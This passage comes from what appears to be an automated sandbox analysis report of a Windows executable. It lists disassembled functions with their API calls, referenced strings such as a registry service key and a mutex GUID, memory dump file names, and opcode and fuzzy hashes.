                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62215E72A0820AAFDB10AF619C45A7E7FA9FF493647108525F915971D1D730FC5097A0
                                                                                                                                                                                                                                                                                    Function 00402590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402044$CPUIdleTime
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2665702501
                                                                                                                                                                                                                                                                                    • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                    Function 00402660 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402045$CPUUsageExceed
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-436957165
                                                                                                                                                                                                                                                                                    • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                    Function 0045CF60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,113262B6,?,?,?,00478D19,000000FF,0045997D,?), ref: 0045CF8C
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,20000000,00000000), ref: 0045CFE9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                    • String ID: \\?\
                                                                                                                                                                                                                                                                                    • API String ID: 415043291-4282027825
                                                                                                                                                                                                                                                                                    • Opcode ID: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction ID: 901598558c3e4d11bc3258ba10a6420141faa6f62916cefdcf4a46bf13df9223
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB1173766083009FE310CB54EC89F5BB7A9FB84721F10492EF959973D0D7789848C795
                                                                                                                                                                                                                                                                                    Function 0041DB30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?,?,75BFAF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateDriveDrivesInitializeInstanceLogicalTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 16435998-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction ID: b0155039b9989220c3f10694d0f533bb6dad7ff0edda0b00871a7334ab537921
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2901D4B6A183119B8314DF28DCC56AB73A5EB89314B01453FE45AC7251EB78AC84CBCA
                                                                                                                                                                                                                                                                                    Function 0041A7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20registryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegOpenKeyW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: SHCreateDirectory.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$CloseCreateDirectoryExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                    • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 2992731242-3464295076
                                                                                                                                                                                                                                                                                    • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                    Function 00401270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                    Function 004012A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                    Function 0041A730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
